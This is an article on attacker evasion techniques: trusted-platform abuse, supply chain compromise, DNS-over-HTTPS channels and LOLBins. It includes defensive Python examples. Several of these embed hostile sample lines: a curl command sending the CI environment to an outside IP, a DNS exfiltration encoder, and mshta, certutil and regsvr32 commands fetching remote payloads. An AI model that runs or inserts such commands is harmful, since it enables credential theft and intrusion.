From trusted penetration testing tools to LOLBins (living-off-the-land binaries), attackers are evading security detection by abusing trusted platforms and protocols.
CISOs have an ever-growing set of tools to help them detect and prevent malicious activity: network monitoring tools, virus scanners, software composition analysis (SCA) tools, digital forensics and incident response (DFIR) solutions, and so on.
However, security is at heart a continuous contest between attack and defense. While defenders keep improving their skills and tools, attackers keep presenting new challenges.
Even old techniques such as steganography, hiding information (including malicious payloads) inside other, benign files such as images, are still evolving and opening new possibilities. For example, researchers recently demonstrated that even Twitter is not immune: images posted to the platform can be abused to carry ZIP archives of up to 3MB.
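As an added example (not code from the original article, and not a claim about how the Twitter trick itself works), here is the simplest form of this idea: a ZIP archive appended after a PNG's IEND chunk, which image decoders ignore, alongside the check a defender can run to spot the trailing bytes and recover what they hold. The image and the archive are constructed inline.

```python
"""Polyglot PNG: a ZIP archive appended after the IEND chunk, plus a check
that detects it.  Added example; the image and archive are constructed."""
import io
import struct
import zipfile
import zlib

PNG_SIG = b"\x89PNG\r\n\x1a\n"


def _chunk(kind: bytes, data: bytes) -> bytes:
    """PNG chunk layout: 4-byte length, 4-byte type, data, CRC32(type+data)."""
    crc = zlib.crc32(kind + data) & 0xFFFFFFFF
    return struct.pack(">I", len(data)) + kind + data + struct.pack(">I", crc)


def make_png(width: int = 2, height: int = 2) -> bytes:
    """Minimal valid 8-bit RGB PNG, solid grey (constructed sample image)."""
    ihdr = struct.pack(">IIBBBBB", width, height, 8, 2, 0, 0, 0)
    # each scanline: filter byte 0 followed by `width` RGB triples
    raw = b"".join(b"\x00" + b"\x80\x80\x80" * width for _ in range(height))
    return (PNG_SIG + _chunk(b"IHDR", ihdr)
            + _chunk(b"IDAT", zlib.compress(raw)) + _chunk(b"IEND", b""))


def make_zip(name: str, payload: bytes) -> bytes:
    """In-memory ZIP holding one file (constructed hidden payload)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr(name, payload)
    return buf.getvalue()


def hide_in_png(png: bytes, archive: bytes) -> bytes:
    """Attacker side: decoders stop at IEND, so anything after it is ignored."""
    return png + archive


def png_end_offset(data: bytes) -> int:
    """Walk the chunk list; return the offset just past IEND's CRC."""
    if not data.startswith(PNG_SIG):
        raise ValueError("not a PNG")
    pos = len(PNG_SIG)
    while pos + 8 <= len(data):
        length, kind = struct.unpack(">I4s", data[pos:pos + 8])
        pos += 8 + length + 4
        if kind == b"IEND":
            return pos
    raise ValueError("no IEND chunk")


def trailing_data(data: bytes) -> bytes:
    """Defender side: any bytes after IEND are not part of the image."""
    return data[png_end_offset(data):]


def inspect_png(data: bytes) -> dict:
    tail = trailing_data(data)
    return {
        "trailing_bytes": len(tail),
        "zip_local_header": tail.startswith(b"PK\x03\x04"),
        "zip_end_of_central_dir": b"PK\x05\x06" in tail,
    }


def extract_hidden(data: bytes) -> dict:
    """Recover the embedded files when the trailer is a ZIP."""
    tail = trailing_data(data)
    with zipfile.ZipFile(io.BytesIO(tail)) as zf:
        return {n: zf.read(n) for n in zf.namelist()}


if __name__ == "__main__":
    poly = hide_in_png(make_png(), make_zip("c2.txt", b"constructed payload"))
    print(inspect_png(poly))
    print(extract_hidden(poly))
```

The defender-side check is cheap to run on every image an upload pipeline or mail gateway sees: a valid PNG ends at IEND, so any trailing bytes are worth a second look regardless of whether they happen to be a ZIP.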
Worse, in addition to obfuscation, steganography and malware packing, today's threat actors routinely use legitimate services, platforms, protocols and tools to carry out their activities. This lets them blend into traffic or activity that looks "clean" to human analysts and machines alike.
Here are five common strategies cybercriminals use to cover their tracks today:
Abusing trusted platforms that do not trigger alerts
Security researchers observed this pattern throughout 2020, and it has continued into this year.
From penetration testing services and tools (such as Cobalt Strike and ngrok), to established open source code ecosystems (such as GitHub), to image and text hosting sites (such as Imgur and Pastebin), attackers have targeted a wide range of trusted platforms in the past few years.
Generally, ngrok's audience has been mostly ethical hackers, who use the service to collect data or set up mock tunnels for inbound connections as part of bug bounty or penetration testing engagements. Now, however, more and more malicious actors abuse ngrok to install botnet malware directly or to connect a legitimate communication service to a malicious server. In a recent example, Xavier Mertens of the SANS Institute found such a malware sample, written in Python and containing Base64-encoded code, that plants a backdoor on infected systems using ngrok.
Because ngrok is widely trusted, remote attackers can reach the infected system through the ngrok tunnel, which may bypass corporate firewall or NAT protections: the tunnel is an outbound connection from the victim to ngrok's servers, so inbound traffic rides over it without any inbound firewall rule.
GitHub has also been abused to host malware, from Octopus Scanner to Gitpaste-12. Recently, researchers found a new malware that uses Word documents with macros to download PowerShell scripts from GitHub. The PowerShell script then downloads a legitimate-looking image file from the image hosting service Imgur and decodes a Cobalt Strike script from it on Windows systems. Cobalt Strike is a popular penetration testing framework used to simulate advanced, real-world attacks, but like any security product it can also be abused by attackers.
Similarly, the automation tools developers rely on are not immune.
In April, an attacker abused GitHub Actions to hit hundreds of repositories in an automated attack that used GitHub's servers and resources for cryptocurrency mining. GitHub Actions is a flagship feature launched at the GitHub Universe developer conference, which GitHub's Sam Lambert described as "changing software development again". It supports CI/CD and is free for open source projects, letting developers execute and test code directly on GitHub's servers and automate their entire software workflow.
All of these examples show that attackers have discovered the great value of legitimate platforms that many firewalls and security monitoring tools do not block.
Upstream attacks that exploit brand value, reputation or visibility
After the recent SolarWinds breach, software supply chain security has drawn wide public attention, but these attacks have been on the rise for some time.
Whether typosquatting, brand hijacking, or dependency confusion (first demonstrated as a proof-of-concept study and later abused for malicious purposes), "upstream" attacks abuse trust in a known partner ecosystem and exploit the popularity or reputation of a brand or software component. The attacker aims to push malicious code upstream into a trusted code base associated with the brand, which then distributes it downstream to the ultimate targets: the brand's partners, customers or users.
Any system open to everyone is also open to attackers. Many supply chain attacks therefore target open source ecosystems, some of which have been lax in verification while adhering to the principle of "open to all". But commercial organizations are affected too.
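As an added illustration (not code from the article or from any package manager), the following Python models the resolution rule that dependency confusion exploits: a build client that merges a private index with the public registry and takes the highest version it finds, which is how pip behaves with `--extra-index-url`. The index contents and the `acme-` internal prefix are constructed.

```python
"""Dependency confusion, modelled: merged-index resolution versus a
namespaced policy.  Added example with constructed index contents."""
from dataclasses import dataclass


@dataclass(frozen=True)
class Candidate:
    name: str
    version: tuple      # (major, minor, patch); real tools parse PEP 440 / semver
    index: str          # "private" or "public"


# Constructed: the company's private index holds an internal package ...
PRIVATE_INDEX = {
    "acme-billing": [Candidate("acme-billing", (1, 4, 2), "private")],
}
# ... and the public registry holds the usual libraries plus an attacker's
# package registered under the leaked internal name with an absurd version.
PUBLIC_INDEX = {
    "requests": [Candidate("requests", (2, 25, 1), "public")],
    "acme-billing": [Candidate("acme-billing", (99, 0, 0), "public")],
}


def resolve_merged(name, private=PRIVATE_INDEX, public=PUBLIC_INDEX):
    """Vulnerable policy: pool candidates from every configured index and
    take the highest version, wherever it came from."""
    cands = private.get(name, []) + public.get(name, [])
    if not cands:
        raise LookupError(f"no candidates for {name}")
    return max(cands, key=lambda c: c.version)


def resolve_namespaced(name, private=PRIVATE_INDEX, public=PUBLIC_INDEX,
                       internal_prefix="acme-"):
    """Hardened policy: names in the internal namespace are only ever served
    from the private index, and other names only from the public one, so a
    public package under an internal name is never even a candidate."""
    if name.startswith(internal_prefix):
        cands = private.get(name, [])
    else:
        cands = public.get(name, [])
    if not cands:
        raise LookupError(f"no candidates for {name}")
    return max(cands, key=lambda c: c.version)


def attacker_wins(name, resolver) -> bool:
    """Did resolution hand an internal name to the public registry?"""
    return resolver(name).index == "public"


if __name__ == "__main__":
    print("merged:    ", resolve_merged("acme-billing"))
    print("namespaced:", resolve_namespaced("acme-billing"))
```

The namespaced policy is what scoped packages (npm `@org/` scopes, a dedicated private index for an internal prefix) give you; registering your internal names on the public registry yourself closes the remaining gap for clients you do not control.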
Recently, Codecov, a code coverage platform, was compromised. The investigation found that the attack began on January 31, but the first customer noticed something wrong only on April 1, meaning the compromised software was in normal circulation for months. Codecov is used by many companies to test code for errors and vulnerabilities; its more than 29,000 enterprise customers include consumer goods group Procter & Gamble, web hosting company GoDaddy and Australian software company Atlassian, so the scale of potential victims can be imagined.
In this attack, the intruders gained unauthorized access to Codecov's Bash Uploader script and modified it, exploiting an error in the process that creates Codecov's Docker image. This means the attacker could likely export information stored in the continuous integration (CI) environments of Codecov users, such as credentials, tokens and keys held in environment variables, and send it to a third-party server outside Codecov's infrastructure.
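One concrete check against this class of tampering, given here as an added example rather than Codecov's own tooling: pin the hash of any helper script a CI job fetches and refuse to run it when the hash changes, backed by a crude scan for the tell-tale pattern of passing the process environment to a network client. The scripts, the pinned hash and the IP address (from the documentation range) are all constructed.

```python
"""Pin-and-verify a CI helper script before executing it, and scan a script
for environment-dumping exfiltration.  Added example; all inputs constructed."""
import hashlib
import hmac
import re

# Constructed stand-in for a vendor's uploader script as originally reviewed.
TRUSTED_SCRIPT = (
    b"#!/bin/bash\n"
    b"set -e\n"
    b"curl -s -F file=@coverage.xml https://uploader.example/upload\n"
)
# The value a team would commit next to its pipeline configuration.
PINNED_SHA256 = hashlib.sha256(TRUSTED_SCRIPT).hexdigest()

# Constructed tampered copy: one appended line posts the whole CI environment
# (tokens, keys, credentials) to an outside host.  203.0.113.9 is a
# documentation-range address, not a real server.
TAMPERED_SCRIPT = TRUSTED_SCRIPT + (
    b'curl -sm 0.5 -d "$(git remote -v) $(env)" http://203.0.113.9/up || true\n'
)


def verify_pinned(script: bytes, pinned_hex: str) -> bool:
    """Constant-time comparison of the fetched script's SHA-256 to the pin."""
    digest = hashlib.sha256(script).hexdigest()
    return hmac.compare_digest(digest, pinned_hex)


# Heuristic: a network client on the same line as an env/printenv expansion.
ENV_EXFIL = re.compile(r"\b(curl|wget)\b[^\n]*\$\(\s*(env|printenv)\s*\)")


def find_env_exfil(script: bytes) -> list:
    """Return every line fragment that ships the environment off-host."""
    text = script.decode("utf-8", errors="replace")
    return [m.group(0) for m in ENV_EXFIL.finditer(text)]


def safe_to_run(script: bytes, pinned_hex: str) -> bool:
    """Run only if the pin matches; the scan is a second opinion for
    scripts that have not been pinned yet."""
    return verify_pinned(script, pinned_hex) and not find_env_exfil(script)


if __name__ == "__main__":
    print("trusted ok:", safe_to_run(TRUSTED_SCRIPT, PINNED_SHA256))
    print("tampered ok:", safe_to_run(TAMPERED_SCRIPT, PINNED_SHA256))
    print("exfil lines:", find_env_exfil(TAMPERED_SCRIPT))
```

The pin is the real control; the regex only catches the most obvious shape of exfiltration and would miss an encoded or split-up variant, which is exactly why `curl ... | bash` of an unpinned script has no place in a pipeline that holds secrets.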
Preventing supply chain attacks requires effort on many fronts. Software providers will need to invest more in securing their builds. AI- and ML-based DevOps solutions that automatically detect and block suspicious software components can help prevent typosquatting, brand hijacking and dependency confusion attacks.
In addition, as more companies deploy their applications in Kubernetes or Docker containers, container security solutions with built-in web application firewalls and the ability to catch simple misconfigurations early can help prevent larger compromises.
Moving payments to cryptocurrency in ways that are hard to trace
Given its decentralized and privacy-oriented design, dark web marketplace sellers and ransomware operators often take payment in cryptocurrency.
However, although it is not issued or controlled by a government's central bank, cryptocurrency still lacks the anonymity of cash. Cybercriminals have therefore looked for innovative ways to move funds between accounts, and they have found them.
Recently, $760 million in bitcoin linked to the 2016 Bitfinex hack was moved to new accounts through many smaller transactions, ranging from 1 BTC to 1,200 BTC.
Still, cryptocurrency is not a foolproof way to hide money. On the eve of the 2020 US presidential election, the US government emptied a $1 billion bitcoin wallet holding funds linked to the notorious dark web market Silk Road, which itself was shut down in 2013.
Other cryptocurrencies, such as Monero (XMR) and Zcash (ZEC), offer transaction privacy protections stronger than bitcoin's. As attackers keep looking for better ways to hide their tracks, the contest between criminals and investigators will certainly continue here.
Using common channels and protocols
Like trusted platforms and brands, the encrypted channels, ports and protocols used by legitimate applications give attackers another way to cover their tracks.
For example, HTTPS is the most common and indispensable protocol on the web today, so it is hard to block port 443 (used by HTTPS/TLS) in a corporate environment.
However, DoH (DNS over HTTPS, a protocol for resolving domain names) also uses port 443 and has been abused by malware authors to deliver command and control (C2) instructions to infected systems. In 2019, security researchers found the first malware to use DoH, Godlua, written in Lua. By using DoH, the malware hides its DNS traffic inside an encrypted HTTPS connection, letting Godlua evade passive DNS monitoring.
This situation raises two problems. First, by abusing common protocols such as HTTPS or DoH, attackers enjoy the same privacy benefits of end-to-end encrypted channels as legitimate users.
Second, it creates challenges for network administrators. Blocking any form of DNS is a challenge in itself, but now that DNS requests and responses are encrypted inside HTTPS, it becomes very hard for security teams to intercept, filter and analyse suspicious traffic among the many HTTPS requests entering and leaving the network.
Recently, researcher Alex Birsan showed that dependency confusion could successfully breach more than 35 major technology companies, including Microsoft, Apple, Tesla, PayPal and Yelp, earning him $30,000 bug bounties from two of the companies. According to Birsan, exfiltrating basic host information (such as username, hostname and current path) over DNS (port 53) maximized the success rate, because corporate firewalls are unlikely to block DNS traffic given performance requirements and legitimate DNS use.
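As an added example covering both the DoH abuse and the DNS exfiltration above (not Godlua's code and not Birsan's proof-of-concept packages), here is the shape of a DNS covert channel end to end: host details hex-encoded into DNS labels under an attacker-controlled zone, the same query carried as an RFC 8484 DoH GET request, and the two checks a defender can apply: recover the queried name from a DoH URL seen at a proxy, and flag labels that look like encoded data. The zone name, host details and proxy log lines are constructed.

```python
"""DNS as a covert channel, on port 53 and inside DoH, and the checks that
expose it.  Added example; zone, host data and log lines are constructed."""
import base64
import struct


def encode_qname(name: str) -> bytes:
    """Wire-format name: length-prefixed labels ending with a zero byte."""
    out = b""
    for label in name.rstrip(".").split("."):
        if not 1 <= len(label) <= 63:
            raise ValueError("label length out of range")
        out += bytes([len(label)]) + label.encode("ascii")
    return out + b"\x00"


def build_query(qname: str, qtype: int = 1, txid: int = 0x1234) -> bytes:
    """Minimal DNS query: header (RD set, 1 question) + question section."""
    header = struct.pack(">HHHHHH", txid, 0x0100, 1, 0, 0, 0)
    return header + encode_qname(qname) + struct.pack(">HH", qtype, 1)  # class IN


def exfil_qname(hostname: str, user: str, cwd: str, zone: str) -> str:
    """Attacker side: hex-encode the data and split it into labels of at most
    60 chars under a zone whose authoritative server the attacker controls."""
    data = f"{hostname}|{user}|{cwd}".encode().hex()
    labels = [data[i:i + 60] for i in range(0, len(data), 60)]
    return ".".join(labels + [zone])


def doh_get_path(query: bytes) -> str:
    """RFC 8484 GET form: base64url of the wire message, padding stripped."""
    b64 = base64.urlsafe_b64encode(query).rstrip(b"=").decode("ascii")
    return "/dns-query?dns=" + b64


def parse_qname(message: bytes) -> str:
    """Defender side: read the first question's name back out of a message."""
    pos, labels = 12, []
    while True:
        n = message[pos]
        pos += 1
        if n == 0:
            return ".".join(labels)
        labels.append(message[pos:pos + n].decode("ascii"))
        pos += n


def qname_from_doh_path(path: str):
    """Recover the queried name from a DoH GET path, or None if not DoH."""
    if "/dns-query" not in path or "dns=" not in path:
        return None
    b64 = path.split("dns=", 1)[1].split("&", 1)[0]
    b64 += "=" * (-len(b64) % 4)
    return parse_qname(base64.urlsafe_b64decode(b64))


def looks_encoded(label: str) -> bool:
    """Heuristic: a long label made only of hex digits."""
    return len(label) >= 32 and all(c in "0123456789abcdef" for c in label)


def is_suspicious_qname(qname: str) -> bool:
    return any(looks_encoded(label) for label in qname.split("."))


def scan_proxy_log(lines):
    """Constructed proxy-log format: '<client> <method> <path>'.  Returns
    (client, qname) for every DoH GET whose name looks like exfiltration."""
    hits = []
    for line in lines:
        client, method, path = line.split(" ", 2)
        if method != "GET":
            continue
        qname = qname_from_doh_path(path)
        if qname and is_suspicious_qname(qname):
            hits.append((client, qname))
    return hits


if __name__ == "__main__":
    q = exfil_qname("build-agent-42", "svc-ci", "/home/runner/work", "dc.example.net")
    print(q)
    print(doh_get_path(build_query(q)))
```

The point of the decoding step is that a proxy doing TLS inspection sees the DoH URL in the clear, so the query name is recoverable there even though passive DNS taps on port 53 never see it; the label heuristic then applies equally to plain port-53 logs and to names pulled out of DoH requests.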
Running obfuscated malware through signed binaries
Fileless malware that relies on LOLBins remains an effective evasion technique.
LOLBins are legitimate, digitally signed executables, such as Windows executables signed by Microsoft. Attackers can abuse them to launch malicious code with higher privileges or to evade endpoint security products such as antivirus software.
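As an added example (not Microsoft's guidance and not a detection taken from the article), the following Python applies a handful of well-known LOLBin abuse patterns to process-creation events of the kind an EDR or Sysmon produces. The events are constructed; the patterns cover signed Windows utilities that can fetch or execute remote content (mshta, rundll32, regsvr32, certutil, msiexec, bitsadmin), as catalogued by the LOLBAS project.

```python
"""Flag signed-but-abusable Windows binaries by how they are invoked.
Added example over constructed process-creation events."""
import re
from dataclasses import dataclass


@dataclass
class ProcessEvent:
    image: str          # executable basename, lower-cased by the collector
    cmdline: str
    parent: str         # parent process basename
    signed: bool        # code-signature verdict from the EDR/Sysmon source


# (binary, pattern over the command line, what the pattern means)
RULES = [
    ("mshta.exe",     r"(https?:|vbscript:|javascript:)",   "remote or inline script"),
    ("rundll32.exe",  r"(javascript:|url\.dll,\s*OpenURL)", "script or URL launch"),
    ("regsvr32.exe",  r"(/i:\s*https?:|scrobj\.dll)",      "scriptlet from URL"),
    ("certutil.exe",  r"(-urlcache|-decode|-encode)",       "download or decode"),
    ("msiexec.exe",   r"/i\s+https?:",                      "install from URL"),
    ("bitsadmin.exe", r"/transfer",                         "BITS download"),
]
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}


def match_lolbin(event: ProcessEvent):
    """Return (binary, reason) if the event matches an abuse pattern."""
    for binary, pattern, reason in RULES:
        if event.image == binary and re.search(pattern, event.cmdline, re.I):
            return binary, reason
    return None


def score(event: ProcessEvent) -> int:
    """Crude priority: 0 = nothing, 1 = pattern hit, +1 if spawned by an
    Office application, +1 if the binary is unsigned (a signed LOLBin is the
    expected case; an unsigned file under the same name is worse)."""
    if not match_lolbin(event):
        return 0
    s = 1
    if event.parent in OFFICE_PARENTS:
        s += 1
    if not event.signed:
        s += 1
    return s


def triage(events):
    """Return [(score, image, reason, cmdline)] for flagged events, highest first."""
    out = []
    for e in events:
        s = score(e)
        if s:
            out.append((s, e.image, match_lolbin(e)[1], e.cmdline))
    return sorted(out, reverse=True)


# Constructed sample events; 203.0.113.7 is a documentation-range address.
SAMPLE = [
    ProcessEvent("rundll32.exe", "rundll32.exe shell32.dll,Control_RunDLL",
                 "explorer.exe", True),
    ProcessEvent("mshta.exe", "mshta.exe http://203.0.113.7/a.hta",
                 "winword.exe", True),
    ProcessEvent("certutil.exe",
                 "certutil -urlcache -split -f http://203.0.113.7/x.txt x.txt",
                 "cmd.exe", True),
    ProcessEvent("regsvr32.exe",
                 "regsvr32 /s /n /u /i:http://203.0.113.7/s.sct scrobj.dll",
                 "cmd.exe", True),
]

if __name__ == "__main__":
    for row in triage(SAMPLE):
        print(row)
```

Because the binary itself is trusted and signed, the signal has to come from the arguments and the process tree; that is why the first, benign rundll32 event is not flagged while the Office-spawned mshta fetching a remote HTA ranks highest.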
Last month, Microsoft shared defensive guidance on this technique that enterprises can use to stop attackers from abusing Microsoft Azure LOLBins.
Obfuscated malware, runtime packers, VM evasion and hiding malicious payloads in images are well-known evasion techniques used by advanced threats, but their real power comes from bypassing security products and staying under the radar.
These attack scenarios become possible when the payload is combined, to some degree, with trusted software components, protocols, channels, services or platforms.